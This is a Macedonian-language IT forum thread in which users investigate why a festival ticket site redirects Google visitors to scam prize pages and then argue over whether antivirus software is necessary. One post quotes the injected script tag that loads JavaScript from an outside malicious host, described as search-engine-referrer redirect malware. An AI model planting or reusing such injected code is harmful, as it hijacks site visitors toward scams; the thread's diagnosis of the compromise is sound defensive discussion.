1. Здраво и добредојдовте на форумот на IT.mk.

    Доколку сеуште не сте дел од најголемата заедница на ИТ професионалци и ентузијасти во Македонија, можете бесплатно да се - процесот нема да ви одземе повеќе од 2-3 минути, а за полесна регистрација овозможивме и регистрирање со Facebook и Steam.
    Сокриј

Локален проблем или вметнато во сајтовите ?

Дискусија во форумот 'Вируси // Тројанци // Ботови' започната од NENO19, 16 Јуни 2019.

Тагови:
  1. NENO19

    NENO19
    Intern

    25
    22
    30 Јануари 2011
    Гуглам "Дојран фестивал", ги отворам двана линка и скоро веднаш бев редиректиран на еден .tk потоа на друг сомнителен subdomain каде го има она "you won something" шит. Повторив постапка на виртуелна, се реплицираше проблемот. А немаше проблем со било кој друг сајт што го отворив од дотичниот уред (Win), quick scan BitDefender не дава ништо а Firefox-от во Win нема никакви плагини/addons додадено случајно од некаде. Virustotal вели safe, но дилемата ми е дали нешто ми се шмугнало локално па да превземам мерки. Ако на некој скоро му се случило истото при отворање на линкови од тие два домејна, или ако знае како безбедно да тестира самиот, нека потврди. Напомена дека директно отворање на МК линковите нема да резултира во ништо, но доколку се отворат од резултатот на Google само тогаш ќе се појави редирект. Фала однапред на тој што ќе ми олесни со потврда дека и тој го добил истото.

    [​IMG]
     
  2. Metuzalem

    Metuzalem
    Epic

    6,103
    11,047
    28 ноември 2010
    Машко
    Tootle puffer
    Тие се заразени, од Гугл го отворам Д ФЕСТИВАЛ 2019 - MKTickets , ја отвора таа страница и потоа се менува во некоја ептен сомнителна (Update your Firefox).

    Едит: ја блокирам и таа (всушност анкета „како ви се допаѓа Firefox“) и отвара (редиректира на) цел куп сомнителни страници. Интересно е што стварно се случува само ако дојдеш преку Гугле, ако ја отвориш страницата сама по себе, никому ништо.
     
    Последна промена: 16 Јуни 2019
    На NENO19 му/ѝ се допаѓа ова.
  3. Cika

    Cika
    V.I.P

    2,347
    877
    8 Декември 2009
    Screenshot_20190616-094535.png
    Сѐ е јасно.
     
  4. NENO19

    NENO19
    Intern

    25
    22
    30 Јануари 2011
    Ужас се нашиве. Кога ќе ми текне дека еден ВИП тераше HTTP кога воведоа плаќање со картичка за дополнување припејд кредит.... или едни наши за огласи собрани сите мејлови од база и спам кон истите со обид за изнуда џоа "те имаме на веб камера како....", или класика базата на тогашен мобимак. Чувам xmr cold wallet не за друго. Инаку вакво нешто имаше на kadevecer сајтот пред неколку месеци кога ми текна да го отворам дали е жив. Must be the Russians :p
     
    На philldm му/ѝ се допаѓа ова.
  5. philldm

    philldm
    Intern

    42
    13
    29 Јануари 2018
    Машко
    Сервисер
    Пред некој месец Југоекспорт имаа некои попусти. Народ се утепа од отворање на страницата. На работа среќа имаме Касперски, па си ја тера работата. На едно отворање по 50/60 мајнери, трохани, бекдорови и слиќни гована се трупаа. Им пишав на официјалниот меил, со извештај од Касперски... мукла.

    Испратено од SM-J600FN преку IT.mk форум апликација
     
    На Lokvan му/ѝ се допаѓа ова.
  6. ARMac

    ARMac
    Орган

    5,809
    6,363
    2 oктомври 2010
    Машко
    Курајбер
    Хакнат е.

    Код:
    <script type="text/javascript" src="http://googlbot.su/BqNJYF?frm=script&se_referrer=dfestival.mk&default_keyword=/404javascript.js"></script><!doctype html>
    @Metuzalem да, прилично генијална идеа за малвер е. Генерално се вика SE Redirect malware. Реагира само кога referrer е срџ енџин како гугл. Те носи на your-vip-prizes-here4.life или разни такви домени кои ги прават анкетите, добивте Samsung S9, анкета за гугл, за македонски-Телеком АД лол.
     
    Последна промена: 16 Јуни 2019
    StalkeR, Metuzalem и на NecrotoX им се допаѓа ова.
  7. NecrotoX

    NecrotoX
    Unstoppable

    2,801
    2,636
    4 Март 2013
    Машко
    Илустратор
    Баш пред некој ден посетив некој мак сајт, не ми текнува кој ама не беше од овие порталиве него некој поозбилен и ми даде редирект баш на таква наградна игра за Самсунг телефон и слично, ама во нов таб ми ја отвори, само го изгасив табот и си продужив на сајтот :)
     
  8. Avid

    Avid
    Unbeatable

    3,331
    4,840
    21 Јануари 2009
    У кој пејџ сорс е ова?
    Не ми го дава ни во
    mktickets.mk/event/dfestival/
    ни во
    dfestival.mk/eng/
    Или ради noscript ни во пејџ сорс не ми го дава?
     
  9. Lokvan

    Lokvan
    Unstoppable

    2,313
    3,139
    12 Јануари 2016
    Машко
    Шозборишбе, постоело заразување од нормални секојдневни веб страници дури и без да „кликаш на ЕХЕ фајлови“? :eek:

    Касперски те спасил?
    Пффф... Пази што зборуваш, овде имаме AV рамноземљаши што не веруваат во заразување преку нормални веб страни. Не веруваат во користење безбедносен софтвер a ти со ова им ги повреди верувањата и сега веројатно ќе те натераат да ги излисташ сите пет-шеесет мајнери тројани и секаков малвер, и тоа со скриншот - or it didn't happen! ;)

    /s






    пинг @Avid
    @moongose

    :hay:
     
  10. Avid

    Avid
    Unbeatable

    3,331
    4,840
    21 Јануари 2009
    Знаев дека ќе се јавиш ти боту.
    Ова што го збори членот е друго и сигурно имало некое симнување на фајл и негово пуштање.
    А за другото, како што забележуваш, е РЕДИРЕКТ што значи ќе те однесе на друга страна, тек таму со кликање да симнеш нешто, па да го инсталираш, па тек тогаш да се заразиш.
    Ама твојот когнитивен биас не дозволува ова да го видиш или со сила одиш контра.
    Згора на се, нареди еден куп невистини кои ти си ги имаш извртено но не планирам да те демантирам (веќе еднаш-два пати го сторив тоа), сеј си ги ти и понатака за да се убедуваш дека си во право.
    А најмногу ми се допаѓа дека македонски сајт на ЈУГОЕКСПОРТ го сметаш за нормален сајт xD
    И уште те нема со детално објаснување како бекдор тројан ќе се најде АКТИВИРАН на мојот компјутер, а јас само сум посетил сајт.
     
    Последна промена: 16 Јуни 2019
    На Sukhoi и zlatk0 им се допаѓа ова.
  11. Sukhoi

    Sukhoi
    Practice makes perfect

    1,673
    1,117
    16 Јуни 2010
    Машко
    Локван, не знам како да ти кажам, ама ако ти штракаш на све и свашта ништо живо од тија антивирсуите нема да ти помогне.
    Идејата да не се користи AV не е дека не ги прифаќаме добрите страни на имање заштита, туку напротив ги прифаќем ризиците од тоа и имаме начин да се справиме.
    Проблемот е што домашни компјутери се лесни за одржување, претпоставувам дека сите од нас имаме бекап и заразување не е некој проблем. Ова горното не ми личи на ништо специјално, и да се закачи на системот мислам дека Malwarebyes и Hitman ко од шала ке го средат.
    А и да имаш епско срање направено, бекап и завршена работа. Не гледам спорно ништо?

    За обични корисници(или пак деловна средина) имање AV е задолжително зашто ништо и не разбираат, ама тебе Локван искрено мислам дека нема потреба некој да ти објаснува како да исчистиш заразен систем или дека треба да правиш бекап. А и стварно не знам како се заразувате, ете тој сајт горе и јас искрено би штракнал и бил оштетен ама поедноставно ми е еднаш да искенирам у месец, него авастот нон стоп да ми гњави у позадина.
    А и сам знаеш дека нема AV, што од све ке те заштити, а ако почнам да инсталирам повеќе позадински заштити, анти ова,анти она, па на крај ништо од системот нема да остане.
     
    На The-spiki и moongose им се допаѓа ова.
  12. Zippo

    Zippo
    On your way to fame

    676
    621
    22 oктомври 2014
    Data Analyst
    mktickets редиректира на karti.com.mk кој ми делува дека не е заразен.
     
  13. Lokvan

    Lokvan
    Unstoppable

    2,313
    3,139
    12 Јануари 2016
    Машко
    Да бе трол, колегата сигурно симињал кракови од ЈУГОЕКСПОРТ. Кажи ми поише...

    Што ти се допаѓа тебе е нерелевантно (всушност и не сакам да знам). ;)

    Од друга страна се што се однесува на Југоекспорт се однесува и на повеќето од локалните веб сајтови за помали фирми. Ама кажи поише приказни во стилот ТИ не отвараш македонски веб сајтови дека ТИ си безбеден. Кажи му го тоа на колегата што налетал на страна со малвер. Кажи повеќе, и мрдај повеќе, поинтересно е...
     
  14. Lokvan

    Lokvan
    Unstoppable

    2,313
    3,139
    12 Јануари 2016
    Машко
    Товариш @Sukhoi, твое право е за себе да одлучиш колку одговорно ќe се поставиш кон безбедноста на твоите податоци. Никој не ти го спори тоа право. Не зборуваме за тоа дали поголемо замарање е трпење мал импакт од добар афтермаркет AV или помалку замарање е да враќаш бекапи (а бекапи не правиш секој ден, пошто ако правиш тогаш подобро воопшто да не зборуваме за замарање).
    Уште неколку поенти:
    - од малвер може да изгубиш и повеќе од само податоци (да не шириме повеќе)
    - не е муабетот дека ништо нема да му помогне на нуб со подигнати привилегии кои му овозможуваат да игнорира предупредувања од AV
    - муабетот е дека и за нубови и за познавачи и за сите е подобро да имаат инсталиран безбедносен софтвер, пошто ете погоре и практични примери дека од рандом веб сајтови може да се закачи малвер (нешто што е одамна познато на секој кој ги прати работите). Во дадена ситуација можеш да бидеш и Брус Ли во ај-ти безбедност, ама без соодветен безбедносен софтвер пак ќе јадеш инфекција со малвер (и се што ќе следи потоа)

    Инаку ако на мојов прастар хардвер не се чуствува успорување со се што користам (а има повеќе ставки), на понов хардвер тоа уште помалку ќе се осети ... И без да се лутиш, ама иронично се поплаките заради успорување од AV софтвер - во ситуација кога за оперативен систем се користи најнадуениот блоутвер од ОС кој било кога постоел. ;)

    Веројатно не знаеш дека се надоврзуваш на тролање муабет почнат од авид. Но фер праша, а јас морав фер да ти одговорам. Инаку немав намера ништо вака озбилно да пишувам (иако и тролање на тролови е озбилна работа која некој треба да ја сработи).... А сега поздрав, ја оставам темава за авид на мира да ви објасни раскаже како не е можно заразување преку веб страна и без намерно симнување и кликање на извршни датотеки.
     
  15. Mao

    Mao
    Gaining Experience

    734
    292
    5 Јуни 2007
    Машко
    Значи на било која тема сте спремни очи да си извадите. Вакви работи треба радикално да се санкционираат :D


    Испратено од iPhone преку IT.mk форум апликација
     

Сподели

Вчитување...